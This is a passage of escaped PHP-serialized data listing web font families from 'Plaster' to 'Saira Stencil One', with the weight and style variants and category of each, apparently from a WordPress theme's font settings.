One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Plaster\";a:3:{s:5:\"label\";s:7:\"Plaster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Play\";a:3:{s:5:\"label\";s:4:\"Play\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Playball\";a:3:{s:5:\"label\";s:8:\"Playball\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Playfair Display\";a:3:{s:5:\"label\";s:16:\"Playfair Display\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Playfair Display SC\";a:3:{s:5:\"label\";s:19:\"Playfair Display SC\";s:8:\"variants\";a:6:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"900\";i:3;s:9:\"900italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Podkova\";a:3:{s:5:\"label\";s:7:\"Podkova\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Poiret One\";a:3:{s:5:\"label\";s:10:\"Poiret One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Poller One\";a:3:{s:5:\"label\";s:10:\"Poller One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Poly\";a:3:{s:5:\"label\";s:4:\"Poly\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Pompiere\";a:3:{s:5:\"label\";s:8:\"Pompiere\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Pontano Sans\";a:3:{s:5:\"label\";s:12:\"Pontano Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Poor Story\";a:3:{s:5:\"label\";s:10:\"Poor Story\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Poppins\";a:3:{s:5:\"label\";s:7:\"Poppins\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Port Lligat Sans\";a:3:{s:5:\"label\";s:16:\"Port Lligat Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Port Lligat Slab\";a:3:{s:5:\"label\";s:16:\"Port Lligat Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Potta One\";a:3:{s:5:\"label\";s:9:\"Potta One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Pragati Narrow\";a:3:{s:5:\"label\";s:14:\"Pragati Narrow\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Praise\";a:3:{s:5:\"label\";s:6:\"Praise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Prata\";a:3:{s:5:\"label\";s:5:\"Prata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Preahvihear\";a:3:{s:5:\"label\";s:11:\"Preahvihear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Press Start 2P\";a:3:{s:5:\"label\";s:14:\"Press Start 2P\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Pridi\";a:3:{s:5:\"label\";s:5:\"Pridi\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Princess Sofia\";a:3:{s:5:\"label\";s:14:\"Princess Sofia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Prociono\";a:3:{s:5:\"label\";s:8:\"Prociono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Prompt\";a:3:{s:5:\"label\";s:6:\"Prompt\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Prosto One\";a:3:{s:5:\"label\";s:10:\"Prosto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Proza Libre\";a:3:{s:5:\"label\";s:11:\"Proza Libre\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Public Sans\";a:3:{s:5:\"label\";s:11:\"Public Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Puppies Play\";a:3:{s:5:\"label\";s:12:\"Puppies Play\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Puritan\";a:3:{s:5:\"label\";s:7:\"Puritan\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Purple Purse\";a:3:{s:5:\"label\";s:12:\"Purple Purse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Pushster\";a:3:{s:5:\"label\";s:8:\"Pushster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Qahiri\";a:3:{s:5:\"label\";s:6:\"Qahiri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Quando\";a:3:{s:5:\"label\";s:6:\"Quando\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Quantico\";a:3:{s:5:\"label\";s:8:\"Quantico\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Quattrocento\";a:3:{s:5:\"label\";s:12:\"Quattrocento\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Quattrocento Sans\";a:3:{s:5:\"label\";s:17:\"Quattrocento Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Questrial\";a:3:{s:5:\"label\";s:9:\"Questrial\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Quicksand\";a:3:{s:5:\"label\";s:9:\"Quicksand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Quintessential\";a:3:{s:5:\"label\";s:14:\"Quintessential\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Qwigley\";a:3:{s:5:\"label\";s:7:\"Qwigley\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Qwitcher Grypen\";a:3:{s:5:\"label\";s:15:\"Qwitcher Grypen\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Racing Sans One\";a:3:{s:5:\"label\";s:15:\"Racing Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Radley\";a:3:{s:5:\"label\";s:6:\"Radley\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Rajdhani\";a:3:{s:5:\"label\";s:8:\"Rajdhani\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Rakkas\";a:3:{s:5:\"label\";s:6:\"Rakkas\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Raleway\";a:3:{s:5:\"label\";s:7:\"Raleway\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Raleway Dots\";a:3:{s:5:\"label\";s:12:\"Raleway Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Ramabhadra\";a:3:{s:5:\"label\";s:10:\"Ramabhadra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Ramaraja\";a:3:{s:5:\"label\";s:8:\"Ramaraja\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Rambla\";a:3:{s:5:\"label\";s:6:\"Rambla\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Rammetto One\";a:3:{s:5:\"label\";s:12:\"Rammetto One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Rampart One\";a:3:{s:5:\"label\";s:11:\"Rampart One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Ranchers\";a:3:{s:5:\"label\";s:8:\"Ranchers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Rancho\";a:3:{s:5:\"label\";s:6:\"Rancho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Ranga\";a:3:{s:5:\"label\";s:5:\"Ranga\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Rasa\";a:3:{s:5:\"label\";s:4:\"Rasa\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Rationale\";a:3:{s:5:\"label\";s:9:\"Rationale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Ravi Prakash\";a:3:{s:5:\"label\";s:12:\"Ravi Prakash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Readex Pro\";a:3:{s:5:\"label\";s:10:\"Readex Pro\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Recursive\";a:3:{s:5:\"label\";s:9:\"Recursive\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Red Hat Display\";a:3:{s:5:\"label\";s:15:\"Red Hat Display\";s:8:\"variants\";a:14:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Red Hat Mono\";a:3:{s:5:\"label\";s:12:\"Red Hat Mono\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:12:\"Red Hat Text\";a:3:{s:5:\"label\";s:12:\"Red Hat Text\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Red Rose\";a:3:{s:5:\"label\";s:8:\"Red Rose\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Redacted\";a:3:{s:5:\"label\";s:8:\"Redacted\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Redacted Script\";a:3:{s:5:\"label\";s:15:\"Redacted Script\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Redressed\";a:3:{s:5:\"label\";s:9:\"Redressed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Reem Kufi\";a:3:{s:5:\"label\";s:9:\"Reem Kufi\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Reenie Beanie\";a:3:{s:5:\"label\";s:13:\"Reenie Beanie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Reggae One\";a:3:{s:5:\"label\";s:10:\"Reggae One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Revalia\";a:3:{s:5:\"label\";s:7:\"Revalia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Rhodium Libre\";a:3:{s:5:\"label\";s:13:\"Rhodium Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Ribeye\";a:3:{s:5:\"label\";s:6:\"Ribeye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Ribeye Marrow\";a:3:{s:5:\"label\";s:13:\"Ribeye Marrow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Righteous\";a:3:{s:5:\"label\";s:9:\"Righteous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Risque\";a:3:{s:5:\"label\";s:6:\"Risque\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Road Rage\";a:3:{s:5:\"label\";s:9:\"Road Rage\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Roboto\";a:3:{s:5:\"label\";s:6:\"Roboto\";s:8:\"variants\";a:12:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Roboto Condensed\";a:3:{s:5:\"label\";s:16:\"Roboto Condensed\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Roboto Mono\";a:3:{s:5:\"label\";s:11:\"Roboto Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:11:\"Roboto Slab\";a:3:{s:5:\"label\";s:11:\"Roboto Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Rochester\";a:3:{s:5:\"label\";s:9:\"Rochester\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Rock 3D\";a:3:{s:5:\"label\";s:7:\"Rock 3D\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Rock Salt\";a:3:{s:5:\"label\";s:9:\"Rock Salt\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"RocknRoll One\";a:3:{s:5:\"label\";s:13:\"RocknRoll One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Rokkitt\";a:3:{s:5:\"label\";s:7:\"Rokkitt\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Romanesco\";a:3:{s:5:\"label\";s:9:\"Romanesco\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Ropa Sans\";a:3:{s:5:\"label\";s:9:\"Ropa Sans\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Rosario\";a:3:{s:5:\"label\";s:7:\"Rosario\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Rosarivo\";a:3:{s:5:\"label\";s:8:\"Rosarivo\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Rouge Script\";a:3:{s:5:\"label\";s:12:\"Rouge Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Rowdies\";a:3:{s:5:\"label\";s:7:\"Rowdies\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Rozha One\";a:3:{s:5:\"label\";s:9:\"Rozha One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Rubik\";a:3:{s:5:\"label\";s:5:\"Rubik\";s:8:\"variants\";a:14:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Rubik Beastly\";a:3:{s:5:\"label\";s:13:\"Rubik Beastly\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Rubik Mono One\";a:3:{s:5:\"label\";s:14:\"Rubik Mono One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Ruda\";a:3:{s:5:\"label\";s:4:\"Ruda\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Rufina\";a:3:{s:5:\"label\";s:6:\"Rufina\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Ruge Boogie\";a:3:{s:5:\"label\";s:11:\"Ruge Boogie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Ruluko\";a:3:{s:5:\"label\";s:6:\"Ruluko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Rum Raisin\";a:3:{s:5:\"label\";s:10:\"Rum Raisin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Ruslan Display\";a:3:{s:5:\"label\";s:14:\"Ruslan Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Russo One\";a:3:{s:5:\"label\";s:9:\"Russo One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Ruthie\";a:3:{s:5:\"label\";s:6:\"Ruthie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"Rye\";a:3:{s:5:\"label\";s:3:\"Rye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"STIX Two Text\";a:3:{s:5:\"label\";s:13:\"STIX Two Text\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Sacramento\";a:3:{s:5:\"label\";s:10:\"Sacramento\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Sahitya\";a:3:{s:5:\"label\";s:7:\"Sahitya\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Sail\";a:3:{s:5:\"label\";s:4:\"Sail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Saira\";a:3:{s:5:\"label\";s:5:\"Saira\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Saira Condensed\";a:3:{s:5:\"label\";s:15:\"Saira Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Saira Extra Condensed\";a:3:{s:5:\"label\";s:21:\"Saira Extra Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Saira Semi Condensed\";a:3:{s:5:\"label\";s:20:\"Saira Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Saira Stencil One\";a:3:{s:5:\"label\";s:17:\"Saira Stencil 